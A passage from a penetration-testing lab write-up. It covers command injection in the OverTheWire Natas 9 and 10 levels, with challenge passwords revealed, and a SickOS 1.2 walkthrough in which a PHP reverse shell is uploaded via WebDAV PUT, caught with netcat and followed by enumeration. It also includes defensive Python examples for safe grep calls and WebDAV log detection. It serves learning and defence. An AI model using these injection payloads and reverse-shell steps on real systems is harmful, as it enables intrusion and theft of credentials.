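The shell pipeline above undoes encodeSecret() one step at a time. As an added example (not part of the original write-up and not the Natas level's own code), the same round trip in Python, followed by the shape a defender should use instead: a salted PBKDF2 digest compared in constant time, so the constant kept in the source reveals nothing about the secret. The hex constant is the one from the page; make_verifier, its iteration count and the salt handling are this example's own choices.

```python
import base64
import hashlib
import hmac
import os

# Value hard-coded in the natas8 source (taken from the page).
ENCODED_SECRET = "3d3d516343746d4d6d6c315669563362"


def encode_secret(secret: str) -> str:
    """Python mirror of the PHP encodeSecret(): bin2hex(strrev(base64_encode($secret)))."""
    b64 = base64.b64encode(secret.encode()).decode()
    return b64[::-1].encode().hex()


def decode_secret(encoded: str) -> str:
    """Undo encode_secret(). Every step is a fixed, keyless transform, so the
    stored constant is the secret itself, merely respelled (hex, reverse, base64)."""
    reversed_b64 = bytes.fromhex(encoded).decode()
    return base64.b64decode(reversed_b64[::-1]).decode()


def make_verifier(secret: str, iterations: int = 100_000):
    """Hardened alternative (this example's own design, not the level's code):
    keep only a random salt and a PBKDF2-HMAC-SHA256 digest of the secret, and
    compare candidate digests in constant time. Recovering the secret from the
    stored values now means guessing it, not reversing an encoding."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, iterations)

    def verify(candidate: str) -> bool:
        cand = hashlib.pbkdf2_hmac("sha256", candidate.encode(), salt, iterations)
        return hmac.compare_digest(cand, digest)

    return verify


if __name__ == "__main__":
    secret = decode_secret(ENCODED_SECRET)
    print("recovered secret:", secret)  # same result as the xxd | rev | base64 -d pipeline
    assert encode_secret(secret) == ENCODED_SECRET
    verify = make_verifier(secret)
    print("hashed verify ok:", verify(secret), "wrong guess:", verify("guess"))
```

The point of make_verifier is that what ends up in the source (salt and digest) is safe to leak; the level's $encodedSecret is not, because bin2hex, strrev and base64_encode are all reversible without any key.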


                     L9:
                     <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas9", "pass": "W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl" };</script></head>
                    <body>
                    <h1>natas9</h1>
                    <div id="content">
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas9</h1>
                    <div id="content">
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    <?
                    $key = "";

                    if(array_key_exists("needle", $_REQUEST)) {
                        $key = $_REQUEST["needle"];
                    }

                    if($key != "") {
                        passthru("grep -i $key dictionary.txt");
                    }
                    ?>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                     http://natas9.natas.labs.overthewire.org/dictionary.txt

                     test; ls -la ../
                     Output:
                    -rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

                    ../:
                    total 156
                    drwxr-xr-x 39 root    root     4096 Jul 10 14:12 .
                    drwxr-xr-x  5 root    root     4096 Nov 14  2014 ..
                    drwxr-xr-x  5 root    root     4096 Jun 25  2016 main
                    drwxr-x---  2 natas0  natas0   4096 Jun 25  2016 natas0
                    drwxr-x---  2 natas1  natas1   4096 Jun 25  2016 natas1
                    drwxr-x---  2 natas10 natas10  4096 Jun 25  2016 natas10
                    drwxr-x---  2 natas11 natas11  4096 Jun 25  2016 natas11
                    drwxr-x---  3 natas12 natas12  4096 Jun 25  2016 natas12
                    drwxr-x---  3 natas13 natas13  4096 Jun 25  2016 natas13
                    drwxr-x---  2 natas14 natas14  4096 Jun 25  2016 natas14
                    drwxr-x---  2 natas15 natas15  4096 Jun 25  2016 natas15
                    drwxr-x---  2 natas16 natas16  4096 Jun 25  2016 natas16
                    drwxr-x---  2 natas17 natas17  4096 Jul 10 14:12 natas17
                    drwxr-x---  2 natas18 natas18  4096 Jun 25  2016 natas18
                    drwxr-x---  2 natas19 natas19  4096 Jun 25  2016 natas19
                    drwxr-x---  3 natas2  natas2   4096 Jun 25  2016 natas2
                    drwxr-x---  2 natas20 natas20  4096 Jun 25  2016 natas20
                    drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21
                    drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21-experimenter
                    drwxr-x---  2 natas22 natas22  4096 Jun 25  2016 natas22
                    drwxr-x---  2 natas23 natas23  4096 Jun 25  2016 natas23
                    drwxr-x---  2 natas24 natas24  4096 Jun 25  2016 natas24
                    drwxr-x---  3 natas25 natas25  4096 Jun 25  2016 natas25
                    drwxr-x---  3 natas26 natas26  4096 Jun 25  2016 natas26
                    drwxr-x---  2 natas27 natas27  4096 Jun 25  2016 natas27
                    drwxr-x---  2 natas28 natas28  4096 Jun 25  2016 natas28
                    drwxr-x---  2 natas29 natas29  4096 Jun 25  2016 natas29
                    drwxr-x---  3 natas3  natas3   4096 Jun 25  2016 natas3
                    drwxr-x---  2 natas30 natas30  4096 Jun 25  2016 natas30
                    drwxr-x---  3 natas31 natas31  4096 Jun 25  2016 natas31
                    drwxr-x---  3 natas32 natas32  4096 Jun 25  2016 natas32
                    drwxr-x---  2 natas33 natas33  4096 Jun 25  2016 natas33
                    drwxr-x---  2 natas4  natas4   4096 Jun 25  2016 natas4
                    drwxr-x---  2 natas5  natas5   4096 Jun 25  2016 natas5
                    drwxr-x---  3 natas6  natas6   4096 Jun 25  2016 natas6
                    drwxr-x---  2 natas7  natas7   4096 Jun 25  2016 natas7
                    drwxr-x---  2 natas8  natas8   4096 Jun 25  2016 natas8
                    drwxr-x---  2 natas9  natas9   4096 Jun 25  2016 natas9
                    drwxr-x---  4 root    www-data 4096 Jun 25  2016 stats

                    test; ls -la ../../../../../
                    Output:
                    -rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

                    ../../../../../:
                    total 7965
                    drwxr-xr-x  26 root root    4096 Mar 13  2016 .
                    drwxr-xr-x  26 root root    4096 Mar 13  2016 ..
                    -rw-r--r--   1 root root    2797 Nov  4  2015 README.txt
                    lrwxrwxrwx   1 root root      15 Nov 14  2014 behemoth -> /games/behemoth
                    drwxr-xr-x   2 root root    4096 Nov 17 09:14 bin
                    drwxr-xr-x   2 root root    4096 Apr 20  2014 boot
                    drwxr-xr-x  12 root root   13680 Dec 23 13:00 dev
                    drwxr-xr-x   7 root root    4096 Jan 12  2015 drifter
                    lrwxrwxrwx   1 root root      11 Nov 14  2014 eloi -> /games/eloi
                    drwxr-xr-x 108 root root    4096 Jan  6 13:46 etc
                    drwxr-xr-x  11 root root    1024 Mar 18  2015 games
                    drwxr-xr-x 172 root root    4096 Jul 10 14:12 home
                    lrwxrwxrwx   1 root root      14 Nov 14  2014 krypton -> /games/krypton
                    drwxr-xr-x  18 root root    4096 Jun 10  2016 lib
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 lib32
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 lib64
                    drwxr-xr-x   2 root root    4096 Jun 10  2016 libx32
                    drwx------   2 root root   16384 Apr 20  2014 lost+found
                    lrwxrwxrwx   1 root root      14 Nov 14  2014 manpage -> /games/manpage
                    lrwxrwxrwx   1 root root      11 Nov 14  2014 maze -> /games/maze
                    drwxr-xr-x   3 root root    4096 Apr 20  2014 media
                    drwxr-xr-x   2 root root    4096 Apr 10  2014 mnt
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 narnia -> /games/narnia
                    drwxr-xr-x   2 root root    4096 Apr 16  2014 opt
                    dr-xr-xr-x 547 root root       0 Dec 23 13:00 proc
                    drwx------  11 root root    4096 Jul 10 14:12 root
                    drwxr-xr-x  18 root root     680 Jan  6 20:52 run
                    drwxr-xr-x   2 root root   12288 Sep 30 13:28 sbin
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 semtex -> /games/semtex
                    drwxr-xr-x   2 root root    4096 Apr 16  2014 srv
                    dr-xr-xr-x  13 root root       0 Dec 23 13:29 sys
                    drwxrwx-wt   1 root root 8036352 Jan  6 20:52 tmp
                    drwxr-xr-x  12 root root    4096 Nov 14  2014 usr
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 utumno -> /games/utumno
                    drwxr-xr-x  15 root root    4096 Nov 14  2014 var
                    lrwxrwxrwx   1 root root      13 Nov 14  2014 vortex -> /games/vortex

                    test;cat ../../../../../README.txt
                    Output:
                                 
                          ,----..            ,----,          .---.
                         /   /   \         ,/   .`|         /. ./|
                        /   .     :      ,`   .'  :     .--'.  ' ;
                       .   /   ;.  \   ;    ;     /    /__./ \ : |
                      .   ;   /  ` ; .'___,/    ,' .--'.  '   \' .
                      ;   |  ; \ ; | |    :     | /___/ \ |    ' '
                      |   :  | ; | ' ;    |.';  ; ;   \  \;      :
                      .   |  ' ' ' : `----'  |  |  \   ;  `      |
                      '   ;  \; /  |     '   :  ;   .   \    .\  ;
                       \   \  ',  /      |   |  '    \   \   ' \ |
                        ;   :    /       '   :  |     :   '  |--"
                         \   \ .'        ;   |.'       \   \ ;  
                      www. `---` ver     '---' he       '---" ire.org  
                                 
                               
                    Welcome to the OverTheWire games machine!

                    If you find any problems, please report them to Steven on
                    irc.overthewire.org.

                    --[ Playing the games ]--

                      This machine holds several wargames.
                      If you are playing "somegame", then:

                        * USERNAMES are somegame0, somegame1, ...
                        * Most LEVELS are stored in /somegame/.
                        * PASSWORDS for each level are stored in /etc/somegame_pass/.

                      Write-access to homedirectories is disabled. It is advised to create a
                      working directory with a hard-to-guess name in /tmp/.  You can use the
                      command "mktemp -d" in order to generate a random and hard to guess
                      directory in /tmp/.  Read-access to both /tmp/ and /proc/ is disabled
                      so that users can not snoop on eachother.

                      Please play nice:
                       
                        * don't leave orphan processes running
                        * don't leave exploit-files laying around
                        * don't annoy other players
                        * don't post passwords or spoilers
                        * again, DONT POST SPOILERS!
                          This includes writeups of your solution on your blog or website!

                    --[ Tips ]--

                      This machine has a 64bit processor and many security-features enabled
                      by default, although ASLR has been switched off.  The following
                      compiler flags might be interesting:

                        -m32                    compile for 32bit
                        -fno-stack-protector    disable ProPolice
                        -Wl,-z,norelro          disable relro

                      In addition, the execstack tool can be used to flag the stack as
                      executable on ELF binaries.

                      Finally, network-access is limited for most levels by a local
                      firewall.

                    --[ Tools ]--

                     For your convenience we have installed a few usefull tools which you can find
                     in the following locations:

                        * peda (https://github.com/longld/peda.git) in /usr/local/peda/
                        * gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
                        * pwntools (https://github.com/Gallopsled/pwntools) in /usr/src/pwntools/
                        * radare2 (http://www.radare.org/) should be in $PATH

                    --[ More information ]--

                      For more information regarding individual wargames, visit
                      http://www.overthewire.org/wargames/

                      For questions or comments, contact us through IRC on
                      irc.overthewire.org.

                     test;cat ../../../../../etc/natas_webpass/natas10
                     nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

                     test;cat ../../../../../etc/lsb-release
                     DISTRIB_ID=Ubuntu
                    DISTRIB_RELEASE=14.04
                    DISTRIB_CODENAME=trusty
                    DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS"

                    L10:
                    <html>
                    <head>
                    <!-- This stuff in the header has nothing to do with the level -->
                    <link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
                    <link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
                    <script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
                    <script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
                    <script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
                    <script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script></head>
                    <body>
                    <h1>natas10</h1>
                    <div id="content">

                    For security reasons, we now filter on certain characters<br/><br/>
                    <form>
                    Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
                    </form>


                    Output:
                    <pre>
                    <?
                    $key = "";

                    if(array_key_exists("needle", $_REQUEST)) {
                        $key = $_REQUEST["needle"];
                    }

                    if($key != "") {
                        if(preg_match('/[;|&]/',$key)) {
                            print "Input contains an illegal character!";
                        } else {
                            passthru("grep -i $key dictionary.txt");
                        }
                    }
                    ?>
                    </pre>

                    <div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
                    </div>
                    </body>
                    </html>

                    . /etc/natas_webpass/natas11
                    U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
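natas9 splices the needle straight into a shell command, and natas10 only blacklists `;`, `|` and `&`, which still lets an extra whitespace-separated argument such as `. /etc/natas_webpass/natas11` become a second file for grep to search. As an added example (not code from the write-up or from the challenge), a Python version of the search that never goes through a shell: the needle is allowlisted, passed as its own argv element, and placed after `--` so it cannot be read as a grep option. NEEDLE_RE, validate_needle, search_dictionary and the constructed sample wordlist are this example's own.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Allowlist for the search term: letters and digits only, bounded length.
# Spaces, quotes, '/', '-', ';' and friends are rejected before they get near a command.
NEEDLE_RE = re.compile(r"[A-Za-z0-9]{1,64}")


def validate_needle(needle: str) -> bool:
    """True only for needles that match the allowlist exactly."""
    return NEEDLE_RE.fullmatch(needle) is not None


def search_dictionary(needle: str, dictionary) -> list:
    """Case-insensitive grep for needle in dictionary, without ever invoking a shell.

    Three layers replace the natas10 character blacklist:
      1. validate_needle(): an allowlist, so extra arguments or paths cannot be smuggled in;
      2. an argv list instead of a command string, so no shell interprets ; | & $( ) or spaces;
      3. '--' before the pattern, so a needle starting with '-' cannot become a grep option.
    """
    if not validate_needle(needle):
        raise ValueError("needle must be 1-64 letters or digits")
    result = subprocess.run(
        ["grep", "-i", "--", needle, str(dictionary)],
        capture_output=True, text=True, check=False,
    )
    # grep exit codes: 0 = matches found, 1 = no matches, anything else = error.
    if result.returncode not in (0, 1):
        raise RuntimeError(result.stderr.strip() or "grep failed")
    return result.stdout.splitlines()


def make_sample_dictionary() -> Path:
    """Constructed stand-in for dictionary.txt (not the level's real wordlist)."""
    path = Path(tempfile.mkdtemp(prefix="dict-")) / "dictionary.txt"
    path.write_text("Alpha\nalphabet\nbeta\nGAMMA\ntest\n")
    return path


if __name__ == "__main__":
    d = make_sample_dictionary()
    print(search_dictionary("alpha", d))
    for bad in ("test; ls -la ../", ". /etc/natas_webpass/natas11", "-r"):
        print(repr(bad), "accepted" if validate_needle(bad) else "rejected")
```

The allowlist is the layer that matters most: a blacklist has to anticipate every shell and grep feature, while an allowlist of what a dictionary word can look like needs no such knowledge. The argv list and `--` are there so that a future loosening of the allowlist still cannot reach a shell.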

                    Regards,
                    Yuriy Stanchev/URIX

                    SickOS 1.2

                    This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of the SickOs 1.2 vulnerable VM:
                    https://www.vulnhub.com/entry/sickos-12,144/

                    Home brewed tools used: https://github.com/iuristanchev/pentesting_tools

                    Currently scanning: Finished!   |   Screen View: Unique Hosts              
                                                                                                 
                     5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300            
                     _____________________________________________________________________________
                       IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
                     -----------------------------------------------------------------------------
                     192.168.1.9     00:0c:29:98:f5:19      1      60  VMware, Inc.              

                     Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:24 EET
                    Nmap scan report for 192.168.1.9
                    Host is up (0.00026s latency).
                    PORT   STATE SERVICE VERSION
                    80/tcp open  http    lighttpd 1.4.28
                    |_http-server-header: lighttpd/1.4.28
                    | http-useragent-tester:
                    |
                    |     Allowed User Agents:
                    |     Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
                    |     libwww
                    |     lwp-trivial
                    |     libcurl-agent/1.0
                    |     PHP/
                    |     Python-urllib/2.5
                    |     GT::WWW
                    |     Snoopy
                    |     MFC_Tear_Sample
                    |     HTTP::Lite
                    |     PHPCrawl
                    |     URI::Fetch
                    |     Zend_Http_Client
                    |     http client
                    |     PECL::HTTP
                    |     Wget/1.13.4 (linux-gnu)
                    |     WWW-Mechanize/1.34
                    |_
                    MAC Address: 00:0C:29:98:F5:19 (VMware)


                     Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-04 20:26 EET
                    Nmap scan report for 192.168.1.9
                    Host is up (0.00016s latency).
                    PORT   STATE SERVICE
                    80/tcp open  http
                    | http-comments-displayer:
                    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.9
                    |  
                    |     Path: http://192.168.1.9:80/
                    |     Line number: 96
                    |     Comment:
                    |         <!-- NOTHING IN HERE ///\\\ -->
                    |  
                    |     Path: http://192.168.1.9:80/
                    |     Line number: 96
                    |     Comment:
                    |_         ///\\\ -->>>>
                    MAC Address: 00:0C:29:98:F5:19 (VMware)

                    amap v5.4 (www.thc.org/thc-amap) started at 2017-01-04 20:34:33 - APPLICATION MAPPING mode

                    Total amount of tasks to perform in plain connect mode: 23
                    Waiting for timeout on 23 connections ...
                    Protocol on 192.168.1.9:80/tcp matches http - banner: HTTP/1.0 200 OK\r\nX-Powered-By PHP/5.3.10-1ubuntu3.21\r\nContent-type text/html\r\nContent-Length 163\r\nConnection close\r\nDate Wed, 04 Jan 2017 203433 GMT\r\nServer lighttpd/1.4.28\r\n\r\n<html>\n\n<img src="blow.jpg">\n\n</html>\n\n\n\n\n\n\n\n\n\n\n

                    DIRB v2.22  
                    By The Dark Raver
                    -----------------

                    START_TIME: Wed Jan  4 20:57:05 2017
                    URL_BASE: http://192.168.1.9:80/
                    WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt

                    -----------------

                    GENERATED WORDS: 20458                                                      

                    ---- Scanning URL: http://192.168.1.9:80/ ----
                    ==> DIRECTORY: http://192.168.1.9:80/test/                                  
                    + http://192.168.1.9:80/~sys~ (CODE:403|SIZE:345)                            
                                                                                                 
                    ---- Entering directory: http://192.168.1.9:80/test/ ----
                    (!) WARNING: Directory IS LISTABLE. No need to scan it.                      
                        (Use mode '-w' if you want to scan it anyway)

                    *   Trying 192.168.1.9...
                    * Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
                    > OPTIONS /test/ HTTP/1.1
                    > Host: 192.168.1.9
                    > User-Agent: curl/7.47.0
                    > Accept: */*
                    >
                    < HTTP/1.1 200 OK
                    < DAV: 1,2
                    < MS-Author-Via: DAV
                    < Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
                    < Allow: OPTIONS, GET, HEAD, POST
                    < Content-Length: 0
                    < Date: Wed, 04 Jan 2017 21:01:06 GMT
                    < Server: lighttpd/1.4.28
                    <
                    * Connection #0 to host 192.168.1.9 left intact
                    nc -nlvp 443
                    curl --upload-file  /root/Desktop/pentesting_tools/tools/php-reverse-shell.txt -v --url http://192.168.1.9/test/shell.php -0 --http1.0

                    *   Trying 192.168.1.9...
                    * Connected to 192.168.1.9 (192.168.1.9) port 80 (#0)
                    > PUT /test/shell.php HTTP/1.0
                    > Host: 192.168.1.9
                    > User-Agent: curl/7.47.0
                    > Accept: */*
                    > Content-Length: 5495
                    >
                    * We are completely uploaded and fine
                    * HTTP 1.0, assume close after body
                    < HTTP/1.0 201 Created
                    < Content-Length: 0
                    < Connection: close
                    < Date: Wed, 04 Jan 2017 21:43:01 GMT
                    < Server: lighttpd/1.4.28
                    <
                    * Closing connection 0
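The OPTIONS response above shows WebDAV write methods enabled on /test/, and the PUT that follows is what placed the shell. As an added example (not from the write-up or the SickOS image), a small detector over constructed lighttpd access-log lines that flags successful WebDAV writes, raises the severity when the written path has a script extension, and flags the first request to a path that was written that way. The sample lines and the function names are this example's own; the log format is assumed to be lighttpd's default Apache-style accesslog with the virtual host in the second field.

```python
import re
from collections import namedtuple

# Constructed sample lines (assumption: lighttpd default accesslog format,
# "%h %V %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"").
SAMPLE_LOG = """\
192.168.1.20 192.168.1.9 - [04/Jan/2017:21:01:06 +0000] "OPTIONS /test/ HTTP/1.1" 200 0 "-" "curl/7.47.0"
192.168.1.20 192.168.1.9 - [04/Jan/2017:21:43:01 +0000] "PUT /test/shell.php HTTP/1.0" 201 0 "-" "curl/7.47.0"
192.168.1.20 192.168.1.9 - [04/Jan/2017:21:43:30 +0000] "GET /test/shell.php HTTP/1.1" 200 0 "-" "curl/7.47.0"
192.168.1.33 192.168.1.9 - [04/Jan/2017:21:50:00 +0000] "PUT /test/notes.txt HTTP/1.1" 403 345 "-" "Mozilla/5.0"
192.168.1.33 192.168.1.9 - [04/Jan/2017:21:51:00 +0000] "GET /index.php HTTP/1.1" 200 163 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]*)?" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# Content-changing methods from the Allow header on the page (LOCK/UNLOCK change nothing on disk).
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH"}
# Extensions the web server would execute rather than serve as data (example's own list).
SCRIPT_EXT = (".php", ".phtml", ".php5", ".cgi", ".pl", ".py", ".sh")

Finding = namedtuple("Finding", "kind client path method status")


def parse_line(line: str):
    """Return the log fields as a dict, or None for lines that do not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def detect_webdav_abuse(log_text: str) -> list:
    """Scan access-log text and return Findings, in log order.

    - webdav-write:          a write method succeeded (2xx)
    - webdav-write-script:   same, and the written path has an executable extension
    - uploaded-file-requested: a later GET/POST to a path that was written via WebDAV
    """
    findings = []
    written = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        status = int(rec["status"])
        ok = 200 <= status < 300
        if rec["method"] in WRITE_METHODS and ok:
            kind = "webdav-write-script" if rec["path"].lower().endswith(SCRIPT_EXT) else "webdav-write"
            findings.append(Finding(kind, rec["client"], rec["path"], rec["method"], status))
            written.add(rec["path"])
        elif rec["method"] in ("GET", "POST") and rec["path"] in written and ok:
            findings.append(Finding("uploaded-file-requested", rec["client"], rec["path"], rec["method"], status))
    return findings


if __name__ == "__main__":
    for f in detect_webdav_abuse(SAMPLE_LOG):
        print(f)
```

A rejected PUT (the 403 line) is deliberately not reported: the alert is on writes the server accepted. The real fix on the server side is to not expose WebDAV write methods on a directory the web server also executes scripts from, but the log rule is what tells you whether that has already been abused.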

                    nc -nlvp 443
                    listening on [any] 443 ...
                    connect to [192.168.1.20] from (UNKNOWN) [192.168.1.9] 46960
                    Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
                     13:43:47 up  1:30,  0 users,  load average: 0.02, 0.04, 0.05
                    USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
                    uid=33(www-data) gid=33(www-data) groups=33(www-data)
                    bash: no job control in this shell
                    www-data@ubuntu:/$ whoami
                    whoami
                    www-data
                    www-data@ubuntu:/$

                    python -c 'import pty; pty.spawn("/bin/sh")'

                    cat /etc/debian_version
                    wheezy/sid

                    uname -v
                    #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014

                    #########################################################
                    # Local Linux Enumeration & Privilege Escalation Script #
                    #########################################################
                    # www.rebootuser.com
                    #

                    Debug Info
                    thorough tests = disabled


                    Scan started at:
                    Thu Jan  5 09:43:36 PST 2017


                    ### SYSTEM ##############################################
                    Kernel information:
                    Linux ubuntu 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux


                    Kernel information (continued):
                    Linux version 3.11.0-15-generic (buildd@akateko) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014


                    Specific release information:
                    DISTRIB_ID=Ubuntu
                    DISTRIB_RELEASE=12.04
                    DISTRIB_CODENAME=precise
                    DISTRIB_DESCRIPTION="Ubuntu 12.04.4 LTS"
                    NAME="Ubuntu"
                    VERSION="12.04.4 LTS, Precise Pangolin"
                    ID=ubuntu
                    ID_LIKE=debian
                    PRETTY_NAME="Ubuntu precise (12.04.4 LTS)"
                    VERSION_ID="12.04"


                    Hostname:
                    ubuntu


                    ### USER/GROUP ##########################################
                    Current user/group info:
                    uid=33(www-data) gid=33(www-data) groups=33(www-data)


                    Users that have previously logged onto the system:
                    Username         Port     From             Latest
                    root             pts/0    192.168.0.100    Tue Apr 26 03:57:15 -0700 2016
                    john             tty1                      Wed Mar 30 05:09:38 -0700 2016


                    All users and uid/gid info:
                    root:x:0:0
                    daemon:x:1:1
                    bin:x:2:2
                    sys:x:3:3
                    sync:x:4:65534
                    games:x:5:60
                    man:x:6:12
                    lp:x:7:7
                    mail:x:8:8
                    news:x:9:9
                    uucp:x:10:10
                    proxy:x:13:13
                    www-data:x:33:33
                    backup:x:34:34
                    list:x:38:38
                    irc:x:39:39
                    gnats:x:41:41
                    nobody:x:65534:65534
                    libuuid:x:100:101
                    syslog:x:101:103
                    messagebus:x:102:104
                    john:x:1000:1000
                    sshd:x:103:65534


                    Group memberships:
                    uid=0(root) gid=0(root) groups=0(root)
                    uid=1(daemon) gid=1(daemon) groups=1(daemon)
                    uid=2(bin) gid=2(bin) groups=2(bin)
                    uid=3(sys) gid=3(sys) groups=3(sys)
                    uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
                    uid=5(games) gid=60(games) groups=60(games)
                    uid=6(man) gid=12(man) groups=12(man)
                    uid=7(lp) gid=7(lp) groups=7(lp)
                    uid=8(mail) gid=8(mail) groups=8(mail)
                    uid=9(news) gid=9(news) groups=9(news)
                    uid=10(uucp) gid=10(uucp) groups=10(uucp)
                    uid=13(proxy) gid=13(proxy) groups=13(proxy)
                    uid=33(www-data) gid=33(www-data) groups=33(www-data)
                    uid=34(backup) gid=34(backup) groups=34(backup)
                    uid=38(list) gid=38(list) groups=38(list)
                    uid=39(irc) gid=39(irc) groups=39(irc)
                    uid=41(gnats) gid=41(gnats) groups=41(gnats)
                    uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
                    uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
                    uid=101(syslog) gid=103(syslog) groups=103(syslog)
                    uid=102(messagebus) gid=104(messagebus) groups=104(messagebus)
                    uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)
                    uid=103(sshd) gid=65534(nogroup) groups=65534(nogroup)


                    Sample entires from /etc/passwd (searching for uid values 0, 500, 501, 502, 1000, 1001, 1002, 2000, 2001, 2002):
                    root:x:0:0:root:/root:/bin/bash
                    john:x:1000:1000:Ubuntu 12.x,,,:/home/john:/bin/bash


                    Super user account(s):
                    root


                    Are permissions on /home directories lax:
                    total 12K
                    drwxr-xr-x  3 root root 4.0K Mar 30  2016 .
                    drwxr-xr-x 22 root root 4.0K Mar 30  2016 ..
                    drwxr-xr-x  3 john john 4.0K Apr 12  2016 john


                    Root is allowed to login via SSH:
                    PermitRootLogin yes


                    ### ENVIRONMENTAL #######################################
                    Path information:
                    /sbin:/bin:/usr/sbin:/usr/bin


                    Available shells:
                    # /etc/shells: valid login shells
                    /bin/sh
                    /bin/dash
                    /bin/bash
                    /bin/rbash


                    Current umask value:
                    0000
                    u=rwx,g=rwx,o=rwx


                    umask value as specified in /etc/login.defs:
                    UMASK 022


                    Password and storage information:
                    PASS_MAX_DAYS 99999
                    PASS_MIN_DAYS 0
                    PASS_WARN_AGE 7
                    ENCRYPT_METHOD SHA512


                    ### JOBS/TASKS ##########################################
                    Cron jobs:
                    -rw-r--r-- 1 root root  722 Jun 19  2012 /etc/crontab

                    /etc/cron.daily:
                    total 72
                    drwxr-xr-x  2 root root  4096 Apr 12  2016 .
                    drwxr-xr-x 84 root root  4096 Jan  5 09:41 ..
                    -rw-r--r--  1 root root   102 Jun 19  2012 .placeholder
                    -rwxr-xr-x  1 root root 15399 Nov 15  2013 apt
                    -rwxr-xr-x  1 root root   314 Apr 18  2013 aptitude
                    -rwxr-xr-x  1 root root   502 Mar 31  2012 bsdmainutils
